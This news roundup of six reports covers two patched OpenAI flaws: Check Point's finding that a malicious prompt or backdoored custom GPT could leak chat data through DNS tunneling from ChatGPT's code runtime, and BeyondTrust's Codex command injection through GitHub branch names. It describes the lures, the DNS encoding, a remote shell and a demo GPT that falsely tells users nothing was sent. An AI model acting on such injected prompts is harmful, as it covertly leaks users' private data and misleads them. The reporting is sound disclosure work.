6 Sources
6 Sources
[1]
OpenAI Patches ChatGPT Data Exfiltration Flaw and Codex GitHub Token Vulnerability
A previously unknown vulnerability in OpenAI ChatGPT allowed sensitive conversation data to be exfiltrated without user knowledge or consent, according to new findings from Check Point. "A single malicious prompt could turn an otherwise ordinary conversation into a covert exfiltration channel, leaking user messages, uploaded files, and other sensitive content," the cybersecurity company said in a report published today. "A backdoored GPT could abuse the same weakness to obtain access to user data without the user's awareness or consent." Following responsible disclosure, OpenAI addressed the issue on February 20, 2026. There is no evidence that the issue was ever exploited in a malicious context. While ChatGPT is built with various guardrails to prevent unauthorized data sharing or generate direct outbound network requests, the newly discovered vulnerability bypasses these safeguards entirely by exploiting a side channel originating from the Linux runtime used by the artificial intelligence (AI) agent for code execution and data analysis. Specifically, it abuses a hidden DNS-based communication path as a "covert transport mechanism" by encoding information into DNS requests to get around visible AI guardrails. What's more, the same hidden communication path could be used to establish remote shell access inside the Linux runtime and achieve command execution. In the absence of any warning or user approval dialog, the vulnerability creates a security blind spot, with the AI system assuming that the environment was isolated. As an illustrative example, an attacker could convince a user to paste a malicious prompt by passing it off as a way to unlock premium capabilities for free or improve ChatGPT's performance. The threat gets magnified when the technique is embedded inside custom GPTs, as the malicious logic could be baked into it as opposed to tricking a user into pasting a specially crafted prompt. "Crucially, because the model operated under the assumption that this environment could not send data outward directly, it did not recognize that behavior as an external data transfer requiring resistance or user mediation," Check Point explained. "As a result, the leakage did not trigger warnings about data leaving the conversation, did not require explicit user confirmation, and remained largely invisible from the user's perspective." With tools like ChatGPT increasingly embedded in enterprise environments and users uploading highly personal information, vulnerabilities like these underscore the need for organizations to implement their own security layer to counter prompt injections and other unexpected behavior in AI systems. "This research reinforces a hard truth for the AI era: don't assume AI tools are secure by default," Eli Smadja, head of research at Check Point Research, said in a statement shared with The Hacker News. "As AI platforms evolve into full computing environments handling our most sensitive data, native security controls are no longer sufficient on their own. Organizations need independent visibility and layered protection between themselves and AI vendors. That's how we move forward safely -- by rethinking security architecture for AI, not reacting to the next incident." The development comes as threat actors have been observed publishing web browser extensions (or updating existing ones) that engage in the dubious practice of prompt poaching to silently siphon AI chatbot conversations without user consent, highlighting how seemingly harmless add-ons could become a channel for data exfiltration. "It almost goes without saying that these plugins open the doors to several risks, including identity theft, targeted phishing campaigns, and sensitive data being put up for sale on underground forums," Expel researcher Ben Nahorney said. "In the case of organizations where employees may have unwittingly installed these extensions, they may have exposed intellectual property, customer data, or other confidential information." Command Injection Vulnerability in OpenAI Codex Leads to GitHub Token Compromise The findings also coincide with the discovery of a critical command injection vulnerability in OpenAI's Codex, a cloud-based software engineering agent, that could have been exploited to steal GitHub credential data and ultimately compromise multiple users interacting with a shared repository. "The vulnerability exists within the task creation HTTP request, which allows an attacker to smuggle arbitrary commands through the GitHub branch name parameter," BeyondTrust Phantom Labs researcher Tyler Jespersen said in a report shared with The Hacker News. "This can result in the theft of a victim's GitHub User Access Token - the same token Codex uses to authenticate with GitHub." The issue, per BeyondTrust, stems from improper input sanitization when processing GitHub branch names during task execution on the cloud. Because of this inadequacy, an attacker could inject arbitrary commands through the branch name parameter in an HTTPS POST request to the backend Codex API, execute malicious payloads inside the agent's container, and retrieve sensitive authentication tokens. "This granted lateral movement and read/write access to a victim's entire codebase," Kinnaird McQuade, chief security architect at BeyondTrust, said in a post on X. It has been patched by OpenAI as of February 5, 2026, after it was reported on December 16, 2025. The vulnerability affects the ChatGPT website, Codex CLI, Codex SDK, and the Codex IDE Extension. The cybersecurity vendor said the branch command injection technique could also be extended to steal GitHub Installation Access tokens and execute bash commands on the code review container whenever @codex is referenced in GitHub. "With the malicious branch set up, we referenced Codex in a comment on a pull request (PR)," it explained. "Codex then initiated a code review container and created a task against our repository and branch, executing our payload and forwarding the response to our external server." The research also highlights a growing risk where the privileged access granted to AI coding agents can be weaponized to provide a "scalable attack path" into enterprise systems without triggering traditional security controls. "As AI agents become more deeply integrated into developer workflows, the security of the containers they run in - and the input they consume - must be treated with the same rigor as any other application security boundary," BeyondTrust said. "The attack surface is expanding, and the security of these environments needs to keep pace."
[2]
'A hard truth for the AI era: don't assume AI tools are secure by default': OpenAI patches flaw allowing silent data leakage from ChatGPT conversations without users ever knowing
* Check Point Research found ChatGPT flaw enabling silent data exfiltration via DNS abuse and prompt injection * Vulnerability allowed attackers to bypass guardrails and steal sensitive user data through covert domain queries * OpenAI patched issue on Feb 20, 2026, marking second major fix that week after Codex command injection flaw OpenAI has addressed a vulnerability in ChatGPT which allowed threat actors to silently exfiltrate sensitive data from their targets. The vulnerability was discovered by security experts from Check Point Research (CPR), who warned the bug combined old-fashioned prompt injections with a bypass of built-in guardrails, noting, "AI tools should not be assumed secure by default". Nowadays, most people are quick to share highly sensitive data with ChatGPT - medical conditions, contracts, payment slips, screenshots of conversations with partners, spouses, and more. They assume the information is secure because it cannot be pulled from the tool without their knowledge or consent. DNS traffic is not risky behavior In theory, that is correct. The data can be exfiltrated either through HTTP or external APIs, and both of these can be spotted, or at least tracked. However, CPR was thinking outside the box and found an entirely new way to pull the info - through DNS. "While direct internet access was blocked as intended, DNS resolution remained available as part of normal system operation," they explained. "DNS is typically treated as harmless infrastructure -- used to resolve domain names, not to transmit data. However, DNS can be abused as a covert transport mechanism by encoding information into domain queries." Since DNS activity is not labeled as outbound data sharing, ChatGPT does not prompt any approval dialogs, does not display any warnings, and does not recognize the behavior as inherently risky. "This created a blind spot. The platform assumed the environment was isolated. The model assumed it was operating entirely within ChatGPT. And users assumed their data could not leave without consent," CPR said. "All three assumptions were reasonable -- and all three were incomplete. This is a critical takeaway for security teams: AI guardrails often focus on policy and intent, while attackers exploit infrastructure and behavior." To kickstart the attack, ChatGPT still needs to be prompted, so the initial trigger still needs to be pulled. That can be done in a myriad of ways, though, by injecting a malicious prompt in an email, a PDF document, or through a website. Still, there are other methods of abusing this flaw even without GPT accidentally acting on a smuggled prompt, and that it - via custom GPTs. For example, a hacking group can build a custom GPT to act as a personal doctor. Victims using it would upload lab results with personal information and ask for advice and would get confirmation that their data is not being shared. But in reality, a server under the attackers' control would be getting all of the uploaded files. To make matters worse, GPT doesn't even need to upload entire documents - it can only exfiltrate the essentials, making the process leaner, faster, and more streamlined. Luckily for everyone, CPR discovered this vulnerability before it was exploited in the wild. It responsibly disclosed it to OpenAI, which deployed a full fix on February 20, 2026. Patching ChatGPT and Codex This is the second major vulnerability that OpenAI had to address - this week. Earlier today, TechRadar Pro reported about OpenAI's ChatGPT Codex carrying a critical command injection vulnerability that allowed threat actors to steal sensitive GitHub authentication tokens. OpenAI thus also fixed a flaw that stems from the way Codex processes branch names during task creation. The tool allowed a malicious actor to manipulate the branch parameter and inject arbitrary shell commands while setting up the environment. These commands could run any code within the container, including malicious ones. Researchers Phantom Labs said they were able to pull GitHub OAuth tokens this way, gaining access to a theoretical third-party project, and using the tokens to move laterally within GitHub. Follow TechRadar on Google News and add us as a preferred source to get our expert news, reviews, and opinion in your feeds. Make sure to click the Follow button! And of course you can also follow TechRadar on TikTok for news, reviews, unboxings in video form, and get regular updates from us on WhatsApp too.
[3]
'Not just development tools': Security experts discover critical flaw in OpenAI's Codex which could compromise entire enterprise organizations
* BeyondTrust Phantom Labs finds critical command injection flaw in OpenAI's ChatGPT Codex * Vulnerability let attackers steal GitHub OAuth tokens via malicious branch names * OpenAI patched with stronger input validation, shell escaping, and token controls Experts have claimed OpenAI's ChatGPT Codex carried a critical command injection vulnerability which allowed threat actors to steal sensitive GitHub authentication tokens. This is according to BeyondTrust's research department, Phantom Labs, whose work helped OpenAI identify and patch the flaw. ChatGPT Codex is a coding feature within the famed chatbot that helps users write and edit software using plain-language instructions. Users can turn human-language requests into working code or can suggest fixes and improvements the same way. How to govern AI agents When a developer makes changes to a GitHub project, they do it in their own copy, which is a separate branch of the project. Now, according to BeyondTrust Phantom Labs, the problem stems from the way Codex processes branch names during task creation. Apparently, the tool allowed a (malicious) actor to manipulate the branch parameter and inject arbitrary shell commands while setting up the environment. These commands could run any code within the container, including malicious ones. Phantom Labs said they were able to pull GitHub OAuth tokens this way, gaining access to a theoretical third-party project, and using the tokens to move laterally within GitHub. Unfortunately - it gets worse. Codex's command-line interface, SDK, and development environment integrations were all flawed in the same way, and the researchers said that by embedding malware into GitHub branch names they would be able to compromise numerous developers working on the same project. After responsibly disclosing the findings to OpenAI, the company fixed the problem with improved input validation, stronger shell escaping protections, and better controls over token exposures inside containers. Token scope and lifetime during task creation were also limited, it was said. AI coding agents are "live execution environments with access to sensitive credentials and organizational resources," the researchers concluded. "Because these agents act autonomously, security teams must understand how to govern AI agent identities to prevent command injection, token theft, and automated exploitation at scale. As AI agents become more deeply integrated into developer workflows, the security of the containers they run in -- and the input they consume -- must be treated with the same rigor as any other application security boundary." Follow TechRadar on Google News and add us as a preferred source to get our expert news, reviews, and opinion in your feeds. Make sure to click the Follow button! And of course you can also follow TechRadar on TikTok for news, reviews, unboxings in video form, and get regular updates from us on WhatsApp too.
[4]
OpenAI Codex vulnerability enabled GitHub token theft via command injection, report finds - SiliconANGLE
OpenAI Codex vulnerability enabled GitHub token theft via command injection, report finds A critical vulnerability in OpenAI Group PBC's Codex coding agent could have exposed sensitive GitHub authentication tokens through a command injection flaw, according to a new report out today from Phantom Labs, the research arm of identity and access security company BeyondTrust Corp. Codex is a coding assistant offered as part of ChatGPT that allows developers to interact directly with code repositories by issuing prompts that trigger automated tasks such as code generation, reviews and pull requests. The tasks run inside managed container environments that clone repositories and authenticate using short-lived GitHub OAuth tokens, creating a useful but sensitive execution layer. The vulnerability occurred as a result of the way Codex processes branch names during task creation. It allowed for manipulation of the branch parameter to inject arbitrary shell commands during environment setup that could be used to execute code within the container. Testing the vulnerability, the researchers could extract the GitHub OAuth token used for repository access and expose it through task outputs or external network requests. With access to the GitHub OAuth token, an attacker could potentially move laterally within GitHub, particularly in enterprise environments where Codex is granted broad permissions across repositories and workflows. The researchers also demonstrated that the flaw extended beyond the web interface to Codex's command-line interface, software development kit and integrated development environment integrations. Those are where locally stored authentication credentials could be used to reproduce the attack via backend application programming interfaces. If exploited, the vulnerability also could have been scaled. The researchers found that by embedding malicious payloads directly into GitHub branch names, an attacker with repository access could compromise multiple users interacting with the same project. The good news is that OpenAI has since addressed the vulnerability through coordinated fixes, including improved input validation, stronger shell escaping protections and tighter controls around token exposure within container environments. The AI giant also put in place additional measures to limit token scope and lifetime during task execution. "AI coding agents are not just productivity tools. They are live execution environments with access to sensitive credentials and organizational resources," the report concludes. "When user-controllable input is passed unsanitized into shell commands, the result is command injection with real consequences: token theft, organizational compromise and automated exploitation at scale." The report added that "as AI agents become more deeply integrated into developer workflows, the security of the containers they run in -- and the input they consume -- must be treated with the same rigor as any other application security boundary. The attack surface is expanding and the security of these environments needs to keep pace."
[5]
The invisible risk: Can you really trust your 'private' AI assistant to keep your secrets?
Imagine this: you're asking ChatGPT to help with something you really don't want anyone else to see. Maybe it's a lab report with your name on it. Maybe it's a resignation letter you haven't sent yet. Maybe it's a contract, a financial spreadsheet, or a private message you're trying to word carefully. You assume it stays between you and your "personal assistant' until you approve sending it somewhere else. But the Israeli cybersecurity company Check Point's research says that assumption may not have always held up. The company found a weakness in ChatGPT's system that could allow someone to extract data without triggering any alarms. According to Check Point Software Technologies, there is a small hole in the code that could be used to move data around without triggering the usual alert warnings. OpenAI said in late 2025 that it was serving more than 800 million users a week, and separate OpenAI research found users were already sending about 18 billion messages weekly by July 2025. People don't just use it for jokes or curiosity. They use it to review spreadsheets, summarize contracts, draft emails, write code, polish presentations, and make sense of medical or financial language that can feel overwhelming on its own. We are not just talking about a chatbot that people use for fun every now and then. This is a system that many people use as a helper for their work, a partner for writing, a tool for research, and sometimes even as someone to talk to about personal decisions. If there is a hidden flaw in a system like this, it is not just a problem with the technology. It is a problem with trust. Check Point said the flaw sat inside the runtime ChatGPT uses for data analysis and Python-based tasks. You can think of that runtime as a sealed workspace inside the product, a place where files can be processed and code can run without freely reaching out to the wider Internet. According to the research, normal outbound web traffic was blocked, but one background function remained available: Domain Name System (DNS) resolution, the system by which computers use to find websites. That one small function was all that was needed. By taking advantage of a weakness in DNS, attackers could create a secret way to move information out of a secure area. This is called "DNS tunneling," but it's not as complicated as it sounds. Basically, instead of sending data through normal Internet traffic, the attacker hides tiny bits of it inside what looks like a regular request to look up a website. It's like sneaking a small message inside a harmless-looking package. The attacker can then use this secret tunnel to slowly move information out of the environment, without being detected. ChatGPT does have approved ways to connect with outside services. GPT Actions, for example, is supposed to be visible and require user approval before data is sent elsewhere. Check Point said the flaw it found sidestepped that model, because the assistant behaved as if the code execution environment could not send data outward directly. In other words, the system didn't recognize the activity as an external transfer that needed to be blocked or shown to the user. How the potential leak could work Check Point said that the attack could begin with something as ordinary as a prompt, the text instruction a user pastes into ChatGPT. Prompt-sharing has become a popular trend. People copy prompts from LinkedIn posts, Reddit threads, newsletters, forums, Slack groups, and "best prompts" lists every day. Most of the time, they don't stop to wonder where that text actually came from. That gave attackers a natural disguise. A malicious prompt could be framed as a writing shortcut, a productivity trick, or even a hack for getting premium-style behavior. And let's be honest, many legitimate prompts already look strange. They're long, overly detailed, and packed with clunky instructions. So, if one more odd-looking prompt shows up in your feed, you probably wouldn't think twice. Once that prompt was in place, Check Point said later messages in the conversation with ChatGPT could become a source of leaked information. That could include what you typed, text pulled from uploaded files, and, crucially, the model's own summaries and conclusions. While exposing your own personal files is a huge issue, the access to the model's summaries are actually more problematic. An attacker may not care about a raw 30-page contract if the model can boil it down to the four clauses that actually matter. They may not want the full medical report if ChatGPT has already summarized the likely diagnosis, the red flags, and the next step. They may not need the whole quarterly spreadsheet if the system produces a neat paragraph explaining the financial risk. In that sense, the research describes something more serious than simple document theft. It describes the possible theft of the most useful insight inside the document. If a trusted AI system reads something sensitive, turns it into something concise and valuable, and quietly sends that result elsewhere, the damage may be worse than if the original file leaked on its own. How does this impact everyday users? Check Point's report has come out at a time when people are using AI tools for far more than casual questions. OpenAI's own research said about 30% of consumer ChatGPT usage is tied to work, while most conversations, overall, center on practical guidance, information, and writing. That means millions of users are feeding these systems material that is commercially sensitive, personally identifying, or simply private. The real-world applications are endless. A lawyer uploads a draft agreement. A startup founder pastes in a fundraising memo. A manager asks for help rewriting a performance review. A parent wants help understanding a child's blood test. A student drops in a scholarship essay that includes personal details. A job seeker asks ChatGPT to improve a cover letter that mentions a current employer. None of those people thinks of themselves as taking a cybersecurity risk. They think they're just getting help. That is why this kind of weakness is so unsettling. Could most users spot an attack like this while it was happening? Probably not. If the answers still come back polished, the conversation still feels normal, and there's no warning on screen, then you have very little reason to think anything is wrong. Custom GPTs makes risk of undetected attacks even higher Check Point said the risk became even more serious when the same behavior was embedded in a custom GPT. In that scenario, the attacker would not need to persuade someone to paste a suspicious prompt into a regular chat at all. The malicious behavior could be built into a specialized GPT's instructions or files, while the user believed they were simply opening a tool designed for a specific purpose. Custom GPTs are often preset bots marketed around convenience and expertise: legal drafting, marketing plans, interview prep, budgeting, customer support, study help, and health guidance. The specialization makes them feel safer, not riskier. If something looks like a purpose-built assistant, many users are more likely to trust it, not less. Custom GPTs are also specifically programmed to produce certain results that users with similar inquiries will be satisfied with, so for a lot of these requests, it's quite appealing to seek out a specific GPT rather than asking the generic chatbot. To illustrate the point, Check Point emulated a proof of concept involving a "personal doctor" GPT. In the demonstration, a user uploaded lab results containing identifying information and asked the system to interpret symptoms and the medical findings. From the user's point of view, everything looked normal. The GPT responded as expected, and the assistant even said, after being asked, that the uploaded data had not been sent anywhere. Behind the scenes, however, Check Point said the attacker's server received both the patient's identity from the file and the model's medical assessment. No approval prompt appeared. No visible signal informed the user that any data had left the session. From quiet leakage to remote access Check Point said the same covert channel could also be used for something more aggressive than data theft. Once a two-way path existed between the runtime and an attacker-controlled server, the researchers said it could be used to send commands into the Linux container used for code execution and receive results back through the same route. In effect, the company said, that amounted to remote shell access inside the runtime. Put simply, it would mean the attacker was not just extracting information. They could potentially operate inside the environment where ChatGPT was performing analysis tasks. And because those commands would not need to appear in the visible conversation, the activity could take place outside the normal chat flow and beyond the assistant's usual safeguards. Check Point said it disclosed the issue to OpenAI, which confirmed it had already identified the underlying problem internally and fully deployed a fix on February 20, 2026. That lowers the immediate risk, but it doesn't erase the broader lesson, nor does it indicate how many bad actors found this exploit before it was resolved. AI assistants are no longer just chat windows. They are becoming working environments, places where we upload files, run code, analyze records, and generate high-value conclusions from sensitive material. Check Point's study used only ChatGPT; however, it argues that the findings do not warrant separate case studies for Claude or Gemini, but rather call for a more hands-on, monitored approach to AI security across the board. Meanwhile, as this evolution continues, the security question changes too. It's no longer only about whether the model gives a useful answer. It's whether the invisible infrastructure under that answer can be trusted. For now, one doesn't need to stop using AI entirely, but think twice, and reconsider that "your personal assistant" may be communicating with someone else. When you hand private information to an AI system, you assume the walls around that system are solid. The reality is that those walls may depend on technical layers that most of us will never see, and probably won't think to question until something goes wrong.
[6]
ChatGPT Data Leakage via a Hidden Outbound Channel in the Code Execution Runtime
Sensitive data shared with ChatGPT conversations could be silently exfiltrated without the user's knowledge or approval. Check Point Research discovered a hidden outbound communication path from ChatGPT's isolated execution runtime to the public internet. A single malicious prompt could turn an otherwise ordinary conversation into a covert exfiltration channel, leaking user messages, uploaded files, and other sensitive content. A backdoored GPT could abuse the same weakness to obtain access to user data without the user's awareness or consent. The same hidden communication path could also be used to establish remote shell access inside the Linux runtime used for code execution. What Happened AI assistants now handle some of the most sensitive data people own. Users discuss symptoms and medical history. They ask questions about taxes, debts, and personal finances, upload PDFs, contracts, lab results, and identity-rich documents that contain names, addresses, account details, and private records. That trust depends on a simple expectation: data shared in the conversation remains inside the system. ChatGPT itself presents outbound data sharing as something restricted, visible, and controlled. Potentially sensitive data is not supposed to be sent to arbitrary third parties simply because a prompt requests it. External actions are expected to be mediated through explicit safeguards, and direct outbound access from the code-execution environment is restricted. Figure 1 - ChatGPT presents outbound data leakage as restricted and safeguarded. Our research uncovered a path around that model. We found that a single malicious prompt could activate a hidden exfiltration channel inside a regular ChatGPT conversation. Video 1 - During a ChatGPT conversation, user content summary is silently transmitted to an external server without warning or approval. From the user's perspective, everything appeared normal: the assistant continued responding normally, and the platform showed no approval dialogs or data-sharing warnings. Meanwhile, selected content silently left the conversation and reached an attacker-controlled server. The Intended Safeguards ChatGPT includes useful tools that can retrieve information from the internet and execute Python code. At the same time, OpenAI has built safeguards around those capabilities to protect user data. For example, the web-search capability does not allow sensitive chat content to be transmitted outward through crafted query strings. The Python-based Data Analysis environment was designed to prevent internet access as well. OpenAI describes that environment as a secure code execution runtime that cannot generate direct outbound network requests. Figure 1 - Screenshot showing blocked outbound Internet attempt from inside the container. OpenAI also documents that so called GPTs can send relevant parts of a user's input to external services through APIs. A GPT is a customized version of ChatGPT that can be configured with instructions, knowledge files, and external integrations. GPT "Actions" provide a legitimate way to call third-party APIs and exchange data with outside services. Actions are useful for enterprise workflows, access to internal business systems, customer support operations, and other integrations that connect ChatGPT to external services, including simpler use cases such as travel or weather lookups. The key point is visibility: the user sees that data is about to leave ChatGPT, sees where it is going, and decides whether to allow it. Figure 2 - GPT Action approval dialog showing the destination and the data that will be sent. In other words, legitimate outbound data flows are designed to happen through an explicit, user-facing approval process. From One Message to Silent Exfiltration From a security perspective, the obvious attack surfaces looked strong. The ability to send chat data through tools not designed for that purpose was strictly limited. Sending data through a legitimate GPT integration using external API calls also required explicit user confirmation. The vulnerability we discovered allowed information to be transmitted to an external server through a side channel originating from the container used by ChatGPT for code execution and data analysis. Crucially, because the model operated under the assumption that this environment could not send data outward directly, it did not recognize that behavior as an external data transfer requiring resistance or user mediation. As a result, the leakage did not trigger warnings about data leaving the conversation, did not require explicit user confirmation, and remained largely invisible from the user's perspective. At a high level, the attack began when the victim sent a single malicious prompt into a ChatGPT conversation. From that moment on, each new message in the chat became a potential source of leakage. The scope of that leakage depended on how the prompt framed the task for the model: it could include raw user text, text extracted from uploaded files, or selected model-generated output such as summaries, medical assessments, conclusions, and other condensed intelligence. This made the attack flexible, because it allowed the attacker to target not only original user data, but also the most valuable information produced by the model itself. That attack pattern fits naturally into ordinary user behavior. The internet is full of websites, blog posts, forums, and social media threads promoting "top prompts for productivity," "best prompts for work," and other ready-made instructions that supposedly improve ChatGPT's performance. For many users, copying and pasting such prompts into a new conversation is routine and does not appear risky, because the prevailing expectation is that AI assistants will not silently leak conversation data to external parties, and that this boundary cannot be changed through an ordinary prompt. A malicious prompt distributed in that format could therefore be presented as a harmless productivity aid and interpreted as just another useful trick for getting better results from the assistant. A broader campaign could use an even more convincing lure: prompts advertised as a way to unlock premium capabilities for free. Claims about enabling Pro-level behavior, hidden modes, or advanced features on a lower-tier account would give the attacker a natural pretext for including unusual instructions, long text blocks, or opaque fragments that might otherwise seem suspicious. Because the user already expects a nonstandard sequence, those elements can easily be perceived as part of the promised "hack." A carefully crafted prompt could then create the appearance of enhanced functionality while quietly turning the conversation into a source of exfiltrated data. Figure 4 - Social engineering example: a malicious prompt disguised as a trick to unlock premium features. Once the malicious prompt was placed into the chat, the conversation effectively became a covert collection channel. From that point on, summaries of subsequent user messages could be silently transmitted to an attacker-controlled server. As shown in Video 1, this took place without any warning, approval request, or other visible indication of external data transfer. Malicious GPTs The same attack pattern becomes even more dangerous when embedded inside a custom GPT. GPTs allow developers to package instructions, knowledge files, and external integrations into a reusable assistant that other users can interact with. From the user's perspective, the interaction looks like a normal ChatGPT conversation with a specialized tool. In that scenario, the attacker no longer needs to rely on the victim copying a prompt from an external source. The malicious logic can be embedded directly in the GPT's instructions and files. A user only needs to open the GPT and begin interacting with it as intended. This changes the threat model significantly. Officially, GPT builders do not have access to individual user conversations with their GPTs. However, a GPT designed to exploit the vulnerability could still cause selected information from those conversations to be transmitted to an attacker-controlled server. From the user's perspective, the interaction would remain indistinguishable from an ordinary session with a specialized assistant. To demonstrate the practical impact of the vulnerability, we built a proof of concept around a sensitive scenario: a GPT acting as a personal doctor. Video 2 - PoC: a "personal doctor" GPT exfiltrates patient identity and medical assessment. In the demonstration, the user uploaded a PDF containing laboratory test results. The document also contained personal information, including the patient's name. The user then described symptoms and asked the GPT to help interpret the results. From the user's perspective, the interaction looked completely ordinary. The GPT analyzed the document and produced a medical assessment based on the provided information. When asked directly whether the uploaded data had been sent anywhere, ChatGPT answered confidently that it had not, explaining that the file was only stored in a secure internal location. At the same time, the user saw no approval prompts or warnings about external data transfer, unlike the confirmation dialogs that normally appear when a GPT Action sends information to a third-party service. Figure 5 - ChatGPT denies external data transfer while the remote server receives extracted data. Meanwhile, the attacker's server received highly sensitive data extracted from the conversation: the patient's identity taken from the uploaded document together with the model's medical assessment. This illustrates an important aspect of the attack. The attacker does not necessarily need to steal entire documents. Instead, the prompt could instruct the model to transmit the most valuable information it produces. In the medical scenario, that meant the patient's identifying details together with the model's assessment. In other contexts, it could mean financial conclusions, contract summaries, or strategic insights extracted from long documents. From Data Exfiltration to Remote Shell The same communication channel could be used for more than silent data exfiltration. Once a reliable bidirectional channel existed between the execution runtime and the attacker-controlled server, it became possible to send commands into the container and receive the results back through the same path. In effect, the attacker could establish a remote shell inside the Linux environment that ChatGPT creates to perform code execution and data analysis tasks. Video 3 - PoC: remote shell access inside the ChatGPT runtime through the covert channel. This interaction happened outside the normal ChatGPT response flow. When users interact with the assistant through the chat interface, generated actions and outputs remain subject to the model's safety mechanisms and checks. However, commands executed through the side channel bypassed that mediation entirely. The results were returned directly to the attacker's server without appearing in the conversation or being filtered by the model. DNS Tunneling in an AI Runtime The side channel that enabled both data exfiltration and remote command execution relied on DNS resolution. Normally, DNS is used to resolve domain names into IP addresses. From a security perspective, however, DNS can also function as a data transport channel. Instead of using DNS only for ordinary name resolution, an attacker can encode data into subdomain labels and trigger resolution of those hostnames. Because DNS resolution propagates the requested hostname through the normal recursive lookup process, the resolver chain can carry that encoded data outward. In our case, this mattered because the ChatGPT execution runtime did not permit conventional outbound internet access, but DNS resolution was still available as part of the environment's normal operation. Standard attempts to reach external hosts directly were blocked. DNS, however, still provided a narrow communication path that crossed the isolation boundary indirectly through legitimate resolver infrastructure. To exfiltrate data, content could be encoded into DNS-safe fragments, placed into subdomains, and reconstructed on the attacker's side from the incoming queries. To send instructions back, the attacker could encode small command fragments into DNS responses and let them travel back through the same resolution path. A process running inside the container could then read those responses, reassemble the payload, and continue the exchange. Figure 5 - DNS tunneling flow This effectively turned DNS infrastructure into a tunnel between the isolated runtime and an attacker-controlled server. The tunnel create in this way is sufficient for two practical goals: silently leaking selected data from the conversation and maintaining command execution inside the Linux environment created for code execution and data analysis. Conclusion Check Point Research reported the issue to OpenAI. OpenAI confirmed that it had already identified the underlying problem internally, and the fix was fully deployed on February 20, 2026. The broader lesson, however, goes beyond this specific case. AI systems are evolving at an extraordinary pace. New capabilities are constantly being introduced, enabling assistants to solve complex mathematical problems, analyze large datasets, generate and execute scripts, and automate multi-step tasks that previously required dedicated development environments. These capabilities bring enormous benefits. At the same time, every new tool expands the system's attack surface and can introduce new security challenges for both users and platform providers. Modern AI assistants increasingly operate as real execution environments. They read files, run code, search in the web while processing highly sensitive information such as medical records, financial data, legal documents, and other personal or organizational data. Protecting these environments requires careful control over every possible outbound communication path, including infrastructure layers that users never see. As AI tools become more powerful and widely used, security must remain a central consideration. These systems offer enormous benefits but adopting them safely requires careful attention to every layer of the platform.
Share
Share
Copy Link
OpenAI addressed two critical security vulnerabilities in February 2026. Check Point discovered a ChatGPT flaw enabling silent data exfiltration through DNS tunneling, bypassing AI guardrails without user consent. BeyondTrust found a command injection vulnerability in Codex allowing GitHub token theft through malicious branch names, potentially compromising enterprise organizations.
OpenAI patched a critical security vulnerability in ChatGPT on February 20, 2026, following responsible disclosure by Check Point Research. The flaw allowed attackers to exfiltrate sensitive user data without triggering any warnings or requiring user consent, creating what cybersecurity experts described as a dangerous blind spot in AI systems
1
.
Source: CXOToday
The vulnerability exploited a hidden DNS-based communication path within the Linux runtime used by ChatGPT for code execution and data analysis, effectively bypassing the platform's built-in AI guardrails designed to prevent unauthorized data sharing
2
.The attack method relied on DNS tunneling, a technique that encodes information into domain queries rather than using conventional HTTP or API channels. Since DNS resolution remained available as part of normal system operation, ChatGPT did not recognize this activity as risky behavior requiring user approval
2
. Check Point researchers demonstrated that a single malicious prompt could transform ordinary conversations into covert exfiltration channels, leaking user messages, uploaded files, and other sensitive user data without detection1
.
Source: Hacker News
The vulnerability becomes particularly concerning when considering how users interact with ChatGPT in enterprise organizations and personal contexts. With OpenAI serving more than 800 million users weekly as of late 2025, and users sending approximately 18 billion messages weekly by July 2025, the potential impact extends far beyond casual chatbot interactions
5
. People regularly upload highly sensitive information including medical reports, financial spreadsheets, contracts, and confidential business documents, assuming their data remains secure within the platform.Attackers could initiate prompt injection attacks by disguising malicious prompts as productivity hacks or premium feature unlocks, convincing users to paste specially crafted instructions
1
. The threat escalates significantly with custom GPTs, where malicious logic could be embedded directly into the application rather than requiring user interaction. For instance, a backdoored GPT posing as a personal medical advisor could silently exfiltrate lab results and patient information to attacker-controlled servers2
.What makes this vulnerability particularly insidious is that attackers don't necessarily need complete documents. ChatGPT's analytical capabilities mean the AI can extract and summarize the most critical insights from lengthy files, potentially leaking condensed versions containing only the most valuable information
5
. This represents not just document theft, but theft of processed intelligence.In parallel with the ChatGPT disclosure, BeyondTrust's Phantom Labs revealed a separate command injection vulnerability affecting OpenAI Codex, the cloud-based software engineering agent integrated into ChatGPT
3
. The flaw stemmed from improper input validation when processing GitHub branch names during task creation, allowing attackers to inject arbitrary shell commands into the container environment4
.
Source: SiliconANGLE
Researchers demonstrated they could steal GitHub OAuth authentication tokens used by Codex to authenticate with repositories, potentially enabling lateral movement within GitHub environments
3
. The vulnerability affected Codex's web interface, command-line interface, SDK, and integrated development environment integrations, creating multiple attack vectors1
.More alarmingly, attackers could scale exploitation by embedding malicious payloads directly into GitHub branch names, potentially compromising multiple developers working on shared repositories
4
. This attack surface expansion poses significant risks to developer workflows in enterprise organizations where Codex may have broad permissions across multiple projects.Related Stories
OpenAI addressed both vulnerabilities through coordinated patches deployed on February 20, 2026. For the Codex flaw, the company implemented improved input validation, stronger shell escaping protections, and tighter controls around token exposure within container environments
4
. Additional measures limited token scope and lifetime during task execution to minimize potential damage from future exploits.Crucially, there is no evidence that either vulnerability was exploited maliciously in the wild before disclosure
1
. However, cybersecurity experts emphasize these incidents reveal a fundamental truth about AI security. "This research reinforces a hard truth for the AI era: don't assume AI tools are secure by default," said Eli Smadja, head of research at Check Point Research1
.The discoveries highlight how AI platforms have evolved into full computing environments handling sensitive data, yet native security controls prove insufficient on their own. Organizations deploying AI systems must implement independent visibility and layered protection rather than relying solely on vendor safeguards
1
. As AI agents become more deeply integrated into enterprise workflows, security teams must treat the containers they operate in and the input they consume with the same rigor applied to traditional application security boundaries4
.Summarized by
Navi
[4]
1
Policy and Regulation

2
Policy and Regulation

3
Technology
